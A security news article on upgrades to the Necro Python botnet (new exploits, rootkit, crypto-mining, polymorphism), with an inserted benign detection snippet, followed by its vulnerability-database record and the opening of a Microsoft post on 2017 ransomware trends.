New upgrades have been made to a Python-based "self-replicating, polymorphic bot" called Necro in what's seen as an attempt to improve its chances of infecting vulnerable systems and evading detection.
"Although the bot was originally discovered earlier this year, the latest activity shows numerous changes to the bot, ranging from different command-and-control (C2) communications and the addition of new exploits for spreading, most notably vulnerabilities in VMWare vSphere, SCO OpenServer, Vesta Control Panel and SMB-based exploits that were not present in the earlier iterations of the code," researchers from Cisco Talos [said](<https://blog.talosintelligence.com/2021/06/necro-python-bot-adds-new-tricks.html>) in a deep-dive published today.
Said to be in development as far back as 2015, [Necro](<https://malpedia.caad.fkie.fraunhofer.de/details/py.n3cr0m0rph>) (aka N3Cr0m0rPh) targets both Linux and Windows devices, with heightened activity observed at the start of the year as part of a malware campaign dubbed "[FreakOut](<https://thehackernews.com/2021/01/freakout-ongoing-botnet-attack.html>)" that was found exploiting [vulnerabilities](<https://blog.netlab.360.com/necro/>) in network-attached storage (NAS) devices running on [Linux machines](<https://blog.netlab.360.com/necro-upgrades-again-using-tor-dynamic-domain-dga-and-aiming-at-both-windows-linux/>) to co-opt the machines into a botnet for launching distributed denial-of-service (DDoS) attacks and mining Monero cryptocurrency.
In addition to its DDoS and RAT-like functionalities to download and launch additional payloads, Necro is designed with stealth in mind, installing a rootkit that hides its presence on the system. What's more, the bot also injects malicious code into HTML and PHP files on infected systems; the injected code retrieves and executes a JavaScript-based miner from a remote server.
While previous versions of the malware exploited flaws in Liferay Portal, Laminas Project, and TerraMaster, the latest variants observed on May 11 and 18 feature command injection exploits targeting Vesta Control Panel, ZeroShell 3.9.0, SCO OpenServer 5.0.7, as well as a remote code execution flaw impacting VMware vCenter ([CVE-2021-21972](<https://thehackernews.com/2021/02/critical-rce-flaw-affects-vmware.html>)) that was patched by the company in February.
A version of the botnet, released on May 18, also includes exploits for [EternalBlue](<https://thehackernews.com/2017/04/windows-hacking-tools.html>) (CVE-2017-0144) and [EternalRomance](<https://www.microsoft.com/security/blog/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/>) (CVE-2017-0145), both of which abuse a remote code execution vulnerability in the Windows SMB protocol. These new additions serve to highlight that the malware author is actively developing new methods of spreading by taking advantage of publicly disclosed vulnerabilities.
Also of note is the incorporation of a [polymorphic engine](<https://www.trendmicro.com/vinfo/us/security/definition/Polymorphic-virus>) to mutate its source code with every iteration while keeping the original algorithm intact in a "rudimentary" attempt to limit the chances of being detected.
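A defender-side illustration of why per-file hashes are weak against a bot that rewrites its own source, added here and not taken from the article or from Talos. It assumes the mutation is limited to renaming identifiers and adding comments (the article does not describe the engine), and `VARIANT_A`, `VARIANT_B` and `DIFFERENT` are constructed, benign stand-ins rather than Necro code.

```python
import ast
import builtins
import hashlib

# Constructed, benign samples. VARIANT_B is VARIANT_A with every identifier
# renamed and a comment added; DIFFERENT changes the algorithm (31 -> 33).
VARIANT_A = '''
def checksum(data, seed):
    total = seed
    for byte in data:
        total = (total * 31 + byte) % 65521
    return total
'''

VARIANT_B = '''
def qzxkwv(lmpro, htyue):
    # filler comment that changes the file bytes only
    bnvcx = htyue
    for wqert in lmpro:
        bnvcx = (bnvcx * 31 + wqert) % 65521
    return bnvcx
'''

DIFFERENT = '''
def checksum(data, seed):
    total = seed
    for byte in data:
        total = (total * 33 + byte) % 65521
    return total
'''


def file_hash(source):
    """SHA-256 over the raw text, as a hash blocklist would compute it."""
    return hashlib.sha256(source.encode()).hexdigest()


def _external_names(tree):
    """Names a renamer cannot change freely: builtins and imported modules."""
    keep = set(dir(builtins))
    for node in ast.walk(tree):
        if isinstance(node, (ast.Import, ast.ImportFrom)):
            for alias in node.names:
                keep.add((alias.asname or alias.name).split(".")[0])
    return keep


class _Canonicalise(ast.NodeTransformer):
    """Replace each locally defined identifier with id0, id1, ... in order
    of first appearance, so renamed copies produce the same tree."""

    def __init__(self, keep):
        self.keep = keep
        self.mapping = {}

    def _canon(self, name):
        if name in self.keep:
            return name
        return self.mapping.setdefault(name, f"id{len(self.mapping)}")

    def visit_FunctionDef(self, node):
        node.name = self._canon(node.name)
        return self.generic_visit(node)

    visit_AsyncFunctionDef = visit_FunctionDef
    visit_ClassDef = visit_FunctionDef

    def visit_arg(self, node):
        node.arg = self._canon(node.arg)
        return self.generic_visit(node)

    def visit_Name(self, node):
        node.id = self._canon(node.id)
        return node


def structural_fingerprint(source):
    """Hash of the identifier-normalised AST. Parsing already discards
    comments and layout; ast.dump() omits line and column numbers."""
    tree = ast.parse(source)
    tree = _Canonicalise(_external_names(tree)).visit(tree)
    return hashlib.sha256(ast.dump(tree).encode()).hexdigest()


def same_logic(a, b):
    """True when two sources differ only in naming, comments or layout."""
    return structural_fingerprint(a) == structural_fingerprint(b)


if __name__ == "__main__":
    print("raw hashes equal:       ", file_hash(VARIANT_A) == file_hash(VARIANT_B))
    print("fingerprints equal:     ", same_logic(VARIANT_A, VARIANT_B))
    print("changed algorithm equal:", same_logic(VARIANT_A, DIFFERENT))
```

String literals are left untouched, so an engine that also re-encodes its strings would need those normalised as well before the fingerprints line up.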
"Necro Python bot shows an actor that follows the latest development in remote command execution exploits on various web applications and includes the new exploits into the bot," Talos researchers said. "This increases its chances of spreading and infecting systems. Users need to make sure to regularly apply the latest security updates to all of the applications, not just operating systems."
{"id": "THN:FF56343C15BACA1C1CE83A105EFD7F77", "vendorId": null, "type": "thn", "bulletinFamily": "info", "title": "Necro Python Malware Upgrades With New Exploits and Crypto Mining Capabilities", "description": "[](<https://thehackernews.com/images/-xLbunA9yK10/YLkJxMO-Q1I/AAAAAAAACvM/nmCtDmIhZswOE5N0nip4wXOkRMetd8YbACLcBGAsYHQ/s0/Necro-Python-bot.jpg>)\n\nNew upgrades have been made to a Python-based \"self-replicating, polymorphic bot\" called Necro in what's seen as an attempt to improve its chances of infecting vulnerable systems and evading detection.\n\n\"Although the bot was originally discovered earlier this year, the latest activity shows numerous changes to the bot, ranging from different command-and-control (C2) communications and the addition of new exploits for spreading, most notably vulnerabilities in VMWare vSphere, SCO OpenServer, Vesta Control Panel and SMB-based exploits that were not present in the earlier iterations of the code,\" researchers from Cisco Talos [said](<https://blog.talosintelligence.com/2021/06/necro-python-bot-adds-new-tricks.html>) in a deep-dive published today.\n\nSaid to be in development as far back as 2015, [Necro](<https://malpedia.caad.fkie.fraunhofer.de/details/py.n3cr0m0rph>) (aka N3Cr0m0rPh) targets both Linux and Windows devices, with heightened activity observed at the start of the year as part of a malware campaign dubbed \"[FreakOut](<https://thehackernews.com/2021/01/freakout-ongoing-botnet-attack.html>)\" that was found exploiting [vulnerabilities](<https://blog.netlab.360.com/necro/>) in network-attached storage (NAS) devices running on [Linux machines](<https://blog.netlab.360.com/necro-upgrades-again-using-tor-dynamic-domain-dga-and-aiming-at-both-windows-linux/>) to co-opt the machines into a botnet for launching distributed denial-of-service (DDoS) attacks and mining Monero cryptocurrency.\n\nIn addition to its DDoS and RAT-like functionalities to download and launch additional payloads, Necro is designed 
with stealth in mind by installing a rootkit that hides its presence on the system. What's more, the bot also injects malicious code to retrieve and execute a JavaScript-based miner from a remote server into HTML and PHP files on infected systems.\n\n[](<https://thehackernews.com/images/-T11tz54OU8s/YLkIvEIHiHI/AAAAAAAACvE/w9Z7XokXIogZ_cJ0mnmknp_iSRaHFNCYgCLcBGAsYHQ/s0/hacking-malware.jpg>)\n\nWhile previous versions of the malware exploited flaws in Liferay Portal, Laminas Project, and TerraMaster, the latest variants observed on May 11 and 18 feature command injection exploits targeting Vesta Control Panel, ZeroShell 3.9.0, SCO OpenServer 5.0.7, as well as a remote code execution flaw impacting VMWare vCenter ([CVE-2021-21972](<https://thehackernews.com/2021/02/critical-rce-flaw-affects-vmware.html>)) that was patched by the company in February.\n\nA version of the botnet, released on May 18, also includes exploits for [EternalBlue](<https://thehackernews.com/2017/04/windows-hacking-tools.html>) (CVE-2017-0144) and [EternalRomance](<https://www.microsoft.com/security/blog/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/>) (CVE-2017-0145), both of which abuse a remote code execution vulnerability in Windows SMB protocol. These new additions serve to highlight that the malware author is actively developing new methods of spreading by taking advantage of publicly disclosed vulnerabilities.\n\nAlso of note is the incorporation of a [polymorphic engine](<https://www.trendmicro.com/vinfo/us/security/definition/Polymorphic-virus>) to mutate its source code with every iteration while keeping the original algorithm intact in a \"rudimentary\" attempt to limit the chances of being detected.\n\n\"Necro Python bot shows an actor that follows the latest development in remote command execution exploits on various web applications and includes the new exploits into the bot,\" Talos researchers said. 
\"This increases its chances of spreading and infecting systems. Users need to make sure to regularly apply the latest security updates to all of the applications, not just operating systems.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "published": "2021-06-03T17:01:00", "modified": "2021-06-03T17:01:42", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "baseScore": 10.0}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://thehackernews.com/2021/06/necro-python-malware-upgrades-with-new.html", "reporter": "The Hacker News", "references": [], "cvelist": ["CVE-2017-0144", "CVE-2017-0145", "CVE-2021-21972"], "immutableFields": [], "lastseen": "2022-05-09T12:38:00", "viewCount": 453, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:0B98F2DD-5956-40B0-B275-66C7E7BB4D2D", "AKB:462BB7BE-5D1C-4847-AE1A-07B008F34C9D", 
"AKB:9977C74D-CDF9-4992-9D78-89CEEEAEA23A", "AKB:A2C0FB81-B0C3-4850-9393-E52427779FBF", "AKB:B3E0B6D7-814D-4DB3-BA2B-8C2F79B7BE7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "avleonov", "idList": ["AVLEONOV:98069D08913ADA26D85B10C827D3FE97", "AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2", "AVLEONOV:C8B855FEC3E31BC28C624FF0B19272B7"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0198", "CPAI-2017-0200", "CPAI-2021-0106"]}, {"type": "cisa", "idList": ["CISA:5FE14EDE9F5E20EB9536DC356A82AAB6", "CISA:CB32DB4C2EA92462F387E1DA6C08F57E"]}, {"type": "cve", "idList": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0148", "CVE-2021-21972"]}, {"type": "exploitdb", "idList": ["EDB-ID:49602", "EDB-ID:50056"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "fireeye", "idList": ["FIREEYE:399092589F455855881447C60B56C21A", "FIREEYE:57B0F10A16E18DC672833B1812005B76"]}, {"type": "githubexploit", "idList": ["0C366CAA-5DE0-5E1E-98BD-503473AFAFA2", "0D23F068-44DE-5104-B4F1-A0E53C83D60F", "3738D917-F6B1-5AFF-8F77-DA5EF5276D89", "39EADA2B-CE50-555B-910E-D3B77640C464", "3F8F5249-E116-59FA-9CE1-74380DCC5D51", "441AE17C-8A7C-5FB8-AE3C-667A15B0265F", "46CBB13F-0CFD-5D36-BDAB-38B8D306B155", "4A85B104-7AB3-5334-BEAB-DD8CB273CBAF", "4AE4DA23-9B19-512A-AEC4-4DDC3C1650FC", "502CC8C9-71B8-5BB1-9D39-D1EAA861ABDA", "50618611-3CA9-5185-8ED3-53532D99D4B7", "52C8ABEA-CBB9-5201-A615-BBC5769F9BC3", "55989E2C-3C33-5EB8-AADF-9B52B80F48D6", "5711B5D3-F257-5128-8C1A-908EACEAEC29", "626E6774-0ACC-594C-BB61-E89F8F034B11", "64EF6553-4D22-526B-A1CC-09212DBD7625", "69E38911-1BFE-5166-9FD4-EC8F4997E3DE", "6B607D21-8F2D-50F9-8E60-BC95F2E252E1", "6BCA07B7-CE6D-5F8C-9F75-D9C7E4B072FE", "7B41BE78-EA76-5BF3-A0BC-250C3D753626", "C98B31E5-B85D-50EE-9596-F00F1B89A800", "D359E448-87C6-5DAB-AC08-9E7782F4EBD1", "D4220876-A611-59AE-8262-07797542DAB9", "E99EC1B8-78FB-51D7-A94A-F8B504DFBEF5", 
"F14BCE6F-3415-59C7-AC9D-A5D7ABE1BB8E"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "ibm", "idList": ["425F5D6A5626B05313A3861482065BCFD009527D181E2BC17663ACBA680F983D"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA10979", "KLA11902"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC", "MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}, {"type": "mmpc", "idList": ["MMPC:4A6B394DCAF12E05136AE087248E228C", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:E537BA51663A720821A67D2A4F7F7F0E", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0144", "MS:CVE-2017-0145"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "mssecure", "idList": ["MSSECURE:4A6B394DCAF12E05136AE087248E228C", "MSSECURE:E537BA51663A720821A67D2A4F7F7F0E"]}, {"type": "nessus", "idList": ["700059.PRM", "700099.PRM", "MS17-010.NASL", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN", "SMB_NT_MS17-010.NASL", "VMWARE_VCENTER_CVE-2021-21972.NBIN", "VMWARE_VCENTER_VMSA-2021-0002.NASL", "WEB_APPLICATION_SCANNING_113243"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:142602", "PACKETSTORM:142603", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:161527", "PACKETSTORM:161590", "PACKETSTORM:161695", "PACKETSTORM:163268"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:6652DB89D03D8AA145C2F888B5590E3F", "QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A", "QUALYSBLOG:CAF5B766E6B0E6C1A5ADF56D442E7BB2", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", 
"QUALYSBLOG:E908D08D4163FD6817C8B71F91A20C57"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:076DBD838FD2726D9F20BCEAFC2D960D", "RAPID7BLOG:24E0BE5176F6D3963E1824AD4A55019E", "RAPID7BLOG:2FFDE45F01FA44216BE91DD7AFA0D060", "RAPID7BLOG:5721EC0F74BC2FA3F661282E284C798A", "RAPID7BLOG:7103223D85FA1742C265703CC8D3EE7C", "RAPID7BLOG:7F5516EB3D3811BAE47D74129049D93F", "RAPID7BLOG:B253581ECA2FCB1FA25D45B69A6D7AE5"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "saint", "idList": ["SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:AF0C718105190997E9F68ECCA01B467D"]}, {"type": "securelist", "idList": ["SECURELIST:094B9FCE59977DD96C94BBF6A95D339E", "SECURELIST:20C7BC6E3C43CD3D939A2E3EAE01D4C1", "SECURELIST:CE501995262A06F4E132DE2F9C2B9B6C"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:99260"]}, {"type": "symantec", "idList": ["SMNTC-96704", "SMNTC-96705"]}, {"type": "thn", "idList": ["THN:1ED1BB1B7B192353E154FB0B02F314F4", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:2F8F4C57A4BFEE821BF1AB72DB36A273", "THN:4F010A66018968CA6DAA0432C00DAE10", "THN:71D3B9379166BDEEAEC59EE5E145C193", "THN:816878AF6F6091DFFD5EDD6489062840", "THN:87AE96960D76D6C84D9CF86C2DDB837C", "THN:E18080D17705880B2E7B69B8AB125EA9", "THN:EA407B51944632C248FEB495594123EA"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:2243706D17F2A1E930A00F49D8E30720", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:B0EAC6CA3FDF5A249CE4DD7AC3DD46BD", 
"THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104"]}, {"type": "vmware", "idList": ["VMSA-2021-0002"]}, {"type": "wallarmlab", "idList": ["WALLARMLAB:1493380EEC54B493CC22B4FA116139BB", "WALLARMLAB:7A0E7E3752712070F3E75CEF26AC2CC0"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-27786", "1337DAY-ID-27802", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-35863", "1337DAY-ID-35879", "1337DAY-ID-35912", "1337DAY-ID-36472"]}]}, "score": {"value": -0.1, "vector": "NONE"}, "backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:B3E0B6D7-814D-4DB3-BA2B-8C2F79B7BE7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "avleonov", "idList": ["AVLEONOV:C8B855FEC3E31BC28C624FF0B19272B7"]}, {"type": "canvas", "idList": ["ETERNALBLUE"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0198", "CPAI-2017-0200", "CPAI-2021-0106"]}, {"type": "cisa", "idList": ["CISA:CB32DB4C2EA92462F387E1DA6C08F57E"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0145", "CVE-2021-21972"]}, {"type": "exploitdb", "idList": ["EDB-ID:49602"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "fireeye", "idList": ["FIREEYE:399092589F455855881447C60B56C21A"]}, {"type": "githubexploit", "idList": ["F14BCE6F-3415-59C7-AC9D-A5D7ABE1BB8E"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA10979"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", 
"MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "mmpc", "idList": ["MMPC:4A6B394DCAF12E05136AE087248E228C", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:E537BA51663A720821A67D2A4F7F7F0E", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0144", "MS:CVE-2017-0145"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "mssecure", "idList": ["MSSECURE:4A6B394DCAF12E05136AE087248E228C", "MSSECURE:E537BA51663A720821A67D2A4F7F7F0E"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "VMWARE_VCENTER_CVE-2021-21972.NBIN", "VMWARE_VCENTER_VMSA-2021-0002.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:142602", "PACKETSTORM:142603", "PACKETSTORM:161527", "PACKETSTORM:161590", "PACKETSTORM:161695"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:5721EC0F74BC2FA3F661282E284C798A", "RAPID7BLOG:7F5516EB3D3811BAE47D74129049D93F", "RAPID7BLOG:B253581ECA2FCB1FA25D45B69A6D7AE5"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "saint", "idList": ["SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:9EF85E0CE1D118D27911357B1C516074"]}, {"type": "securelist", "idList": ["SECURELIST:CE501995262A06F4E132DE2F9C2B9B6C"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:99260"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", 
"THN:87AE96960D76D6C84D9CF86C2DDB837C", "THN:EA407B51944632C248FEB495594123EA"]}, {"type": "threatpost", "idList": ["THREATPOST:2243706D17F2A1E930A00F49D8E30720", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104"]}, {"type": "wallarmlab", "idList": ["WALLARMLAB:7A0E7E3752712070F3E75CEF26AC2CC0"]}, {"type": "zdt", "idList": ["1337DAY-ID-27802", "1337DAY-ID-27803"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2017-0144", "epss": "0.974730000", "percentile": "0.999300000", "modified": "2023-03-16"}, {"cve": "CVE-2017-0145", "epss": "0.973650000", "percentile": "0.997970000", "modified": "2023-03-16"}, {"cve": "CVE-2021-21972", "epss": "0.973850000", "percentile": "0.998170000", "modified": "2023-03-17"}], "vulnersScore": -0.1}, "_state": {"dependencies": 1659988328, "score": 1659900266, "epss": 1679073339}, "_internal": {"score_hash": "5c21efda4fde433d1a5571f557691f9c"}}
{"mmpc": [{"lastseen": "2017-09-08T08:23:33", "description": "In the first six months of 2017, [ransomware](<https://www.microsoft.com/en-us/wdsi/threats/ransomware>) threats reached new levels of sophistication. The same period also saw the reversal of a [six-month downward trend](<https://blogs.technet.microsoft.com/mmpc/2017/02/14/ransomware-2016-threat-landscape-review/>) in ransomware encounters. New ransomware code was released at a higher rate with increasing complexity. Two high-profile ransomware incidents brought cybersecurity to the forefront of mainstream conversations as the impact of attacks was felt around the world by organizations and individuals alike.\n\nThe recently released [Microsoft Security Intelligence Report](<https://blogs.microsoft.com/microsoftsecure/2017/08/17/microsoft-security-intelligence-report-volume-22-is-now-available/>) summarizing movements in different areas of the threat landscape in the first quarter of the year showed the continued global presence of ransomware. The highest encounter rates, defined as the percentage of computers running Microsoft real-time security products that report blocking or detecting ransomware, were registered in the Czech Republic, Korea, and Italy from January to March 2017.\n\nSustained ransomware campaigns and high-profile attacks continued to highlight the need for advanced comprehensive cybersecurity strategy. In this blog entry, we share our key observations on the ransomware landscape and offer insights on what can be learned from trends and developments so far in 2017.\n\n\n\n_Figure 1. Global distribution of ransomware encounters by month, January-June 2017_\n\n## Ransomware growth rallies\n\nIn March of 2017, the volume of ransomware encounters started to pick up again after several months of decline. 
The growth is driven to a certain extent by sustained activities from established ransomware operations like [Cerber](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/Cerber>), with an onslaught of attacks powered by [ransomware-as-a-service](<https://www.microsoft.com/en-us/wdsi/help/antimalware-security-glossary#ransomware-as-a-service>).\n\n\n\n_Figure 2. Total ransomware encounters by month, July 2016-June 2017 (source: _[_Ransomware FAQ page_](<https://www.microsoft.com/en-us/wdsi/threats/ransomware>)_)_\n\nIn part, this surge is also driven by the emergence of new ransomware families, which are being released into the wild at a faster rate. In the first half of 2017, we discovered 71 new ransomware families, an increase from the 64 new families we found in the same period in 2016.\n\nSome of these new ransomware families stand out because they exhibit new behaviors that make them more complex. For instance, the latest [Microsoft Security Intelligence Report](<https://blogs.microsoft.com/microsoftsecure/2017/08/17/microsoft-security-intelligence-report-volume-22-is-now-available/>) shows that in March 2017, two-month old [Spora](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/Spora.A>) overtook Cerber as the most prevalent ransomware family.\n\n\n\n_Figure 3. Trends for several commonly encountered ransomware families in 1Q17, by month (source: _[_Microsoft Security Intelligence Report 22_](<https://www.microsoft.com/en-us/security/intelligence-report>)_)_\n\nSpora\u2019s quick rise to the top may be traced to its capability to spread via network drives and removable drives, such as USB sticks. Initial versions targeted Russia and featured a ransom note in the local language. 
It has since gone global, spreading to other countries with a ransom note in English.\n\nOther notable new ransomware families in 2017 include [Jaffrans](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/Jaffrans>), [Exmas](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/Exmas>), and [Ergop](<https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/Ergop.A>). While these families have not quite achieved the prevalence of Spora, they show signs of persistence and periodic improvements that are observed in older, successful families.\n\nMicrosoft protects customers from new and emerging ransomware like Spora using a combination of advanced heuristics, generics, and machine learning, which work together to deliver predictive, real-time protection. In a recent blog post, we demonstrated how we could better [protect from never-before-seen ransomware](<https://blogs.technet.microsoft.com/mmpc/2017/07/18/windows-defender-antivirus-cloud-protection-service-advanced-real-time-defense-against-never-before-seen-malware/>) with enhancements to the Windows Defender Antivirus cloud protection service.\n\n## The rise of global ransomware outbreaks\n\n[WannaCrypt](<https://blogs.technet.microsoft.com/mmpc/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/>) (also known as WannaCry) is one of the most well-known new ransomware to surface so far this year. It emerged in May carrying an exploit for a patched vulnerability and quickly spread to out-of-date Windows 7 computers in Europe and later the rest of the world (the exploit did not affect Windows 10). 
The attack left several impacted organizations, high-tech facilities, and other services affected in its aftermath.\n\nOnly a few weeks after the WannaCrypt outbreak, a new variant of [Petya](<https://blogs.technet.microsoft.com/mmpc/2017/06/27/new-ransomware-old-techniques-petya-adds-worm-capabilities/>) wreaked havoc in June. This Petya variant applied some of the propagation techniques used by WannaCrypt, but incorporated more methods to spread within a network. The outbreak started in Ukraine, where a compromised supply-chain delivered the ransomware through a software update process. The Petya infections swiftly spread to other countries in the course of a few hours. Petya\u2019s impact was not as widespread as the WannaCrypt outbreak; however, as our [in-depth analysis of Petya](<https://blogs.technet.microsoft.com/mmpc/2017/06/27/new-ransomware-old-techniques-petya-adds-worm-capabilities/>) revealed, its upgrades made it so much more complex and caused more damage to organizations affected.\n\nWannaCrypt and Petya defied the trend of more targeted and localized attacks and became the first global malware attacks in quite a while. They generated worldwide mainstream interest. Interestingly, this attention might have added more challenges for attackers. For instance, the Bitcoin wallets used in these attacks were closely monitored by security researchers.\n\nWannaCrypt and Petya showed that ransomware attacks powered by sophisticated exploits on a global scale can be particularly catastrophic. Global attacks emphasize the need to [avert ransomware 